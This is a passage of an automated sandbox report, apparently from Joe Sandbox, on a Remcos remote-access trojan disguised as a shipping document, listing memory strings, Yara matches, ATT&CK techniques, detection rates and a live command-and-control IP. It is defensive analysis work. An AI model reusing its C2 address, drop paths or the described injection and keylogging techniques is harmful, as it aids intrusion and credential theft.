          Source: svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Source: svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 4300, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 1632, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 2420, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 5020, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 2584, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 5888, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 6932, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 4936, type: MEMORY
          Source: Yara matchFile source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: cmd.exe17_2_0040E8B9

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsNative API1Registry Run Keys / Startup Folder1Access Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture211Account Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Process Injection212Scripting1Credentials In Files2File and Directory Discovery3SMB/Windows Admin SharesInput Capture211Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Obfuscated Files or Information3NTDSSystem Information Discovery33Distributed Component Object ModelClipboard Data2Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsSecurity Software Discovery211SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 422673 Sample: MV OLYMPIC PROGRESS VSL PAR... Startdate: 24/05/2021 Architecture: WINDOWS Score: 100 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 11 other signatures 2->57 9 MV OLYMPIC PROGRESS VSL PARTICULARS.exe 3 2->9         started        13 svchosts.exe 2 2->13         started        15 svchosts.exe 2 2->15         started        process3 file4 45 MV OLYMPIC PROGRES...PARTICULARS.exe.log, ASCII 9->45 dropped 65 Injects a PE file into a foreign processes 9->65 17 MV OLYMPIC PROGRESS VSL PARTICULARS.exe 1 5 9->17         started        20 svchosts.exe 13->20         started        22 svchosts.exe 15->22         started        signatures5 process6 file7 41 C:\Users\user\AppData\...\svchosts.exe, PE32 17->41 dropped 43 C:\Users\...\svchosts.exe:Zone.Identifier, ASCII 17->43 dropped 24 cmd.exe 1 17->24         started        process8 signatures9 61 Uses ping.exe to sleep 24->61 63 Uses ping.exe to check the status of other devices and networks 24->63 27 svchosts.exe 3 24->27         started        30 PING.EXE 1 24->30         started        33 conhost.exe 24->33         started        process10 dnsIp11 67 Multi AV Scanner detection for dropped file 27->67 69 Machine Learning detection for dropped file 27->69 71 Injects a PE file into a foreign processes 27->71 35 svchosts.exe 1 3 27->35         started        39 svchosts.exe 27->39         started        49 127.0.0.1 unknown unknown 30->49 signatures12 process13 dnsIp14 47 185.244.26.244, 49739, 49745, 49746 VAMU-ASIP-TRANSITVAMURU Netherlands 35->47 59 Installs a global keyboard hook 35->59 signatures15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          MV OLYMPIC PROGRESS VSL PARTICULARS.exe71%VirustotalBrowse
          MV OLYMPIC PROGRESS VSL PARTICULARS.exe40%MetadefenderBrowse
          MV OLYMPIC PROGRESS VSL PARTICULARS.exe86%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          MV OLYMPIC PROGRESS VSL PARTICULARS.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\remcos\svchosts.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\remcos\svchosts.exe40%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\remcos\svchosts.exe86%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack100%AviraHEUR/AGEN.1115265Download File
          0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack100%AviraHEUR/AGEN.1115265Download File
          23.2.svchosts.exe.4107268.3.unpack100%AviraHEUR/AGEN.1115265Download File
          36.2.svchosts.exe.400000.0.unpack100%AviraHEUR/AGEN.1115265Download File
          22.2.svchosts.exe.4267268.3.unpack100%AviraHEUR/AGEN.1115265Download File
          25.2.svchosts.exe.3cc7268.4.unpack100%AviraHEUR/AGEN.1115265Download File
          31.2.svchosts.exe.400000.0.unpack100%AviraHEUR/AGEN.1115265Download File
          33.2.svchosts.exe.400000.0.unpack100%AviraHEUR/AGEN.1115265Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          185.244.26.2440%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          185.244.26.244true
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.apache.org/licenses/LICENSE-2.0MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
            high
            http://www.fontbureau.comMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
              high
              http://www.fontbureau.com/designersGMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                high
                http://www.fontbureau.com/designers/?MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                  high
                  http://www.founder.com.cn/cn/bTheMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designers?MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                    high
                    http://www.tiro.comsvchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designerssvchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                      high
                      http://www.goodfont.co.krMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.carterandcone.comlMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.sajatypeworks.comMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.typography.netDMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers/cabarga.htmlNMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/cTheMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/staff/dennis.htmMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://fontfabrik.comMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cnMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers/frere-jones.htmlMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                          high
                          http://www.jiyu-kobo.co.jp/MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.galapagosdesign.com/DPleaseMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers8MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                            high
                            http://www.fonts.comMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                              high
                              http://www.sandoll.co.krMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.urwpp.deDPleaseMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.zhongyicts.com.cnMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.sakkal.comMV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              185.244.26.244
                              unknownNetherlands
                              47158VAMU-ASIP-TRANSITVAMURUtrue

                              Private

                              IP
                              127.0.0.1

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:422673
                              Start date:24.05.2021
                              Start time:13:18:44
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:40
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@21/6@0/2
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 3.6% (good quality ratio 2.6%)
                              • Quality average: 54.2%
                              • Quality standard deviation: 40.8%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 254
                              • Number of non-executed functions: 125
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
